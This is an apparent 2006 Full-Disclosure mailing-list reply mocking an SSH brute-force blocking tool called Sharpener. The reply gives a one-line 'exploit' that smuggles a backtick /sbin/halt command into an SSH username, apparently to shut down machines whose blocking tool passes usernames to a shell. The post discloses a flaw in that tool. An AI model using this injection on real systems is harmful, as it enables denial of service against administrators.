On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote: > For those interested, I wrote a program called Sharpener which is an SSH > brute force blocking tool that also reports back the offenders' > addresses. I have begun posting the information on the attackers as well > as sending out messages (whenever possible) to the admins of these > domains. Think of it as an RBL for SSH attackers. The goal is to > identify these machines in order for others to implement safeguards > (ACL's) against these hosts. Feel free to comment/complain. > > > http://www.infiltrated.net/sharpener (tool) > http://www.infiltrated.net/bruteforcers (offenders)
Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim -- ------------------------------------- [EMAIL PROTECTED] | finger me for my pgp key. ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/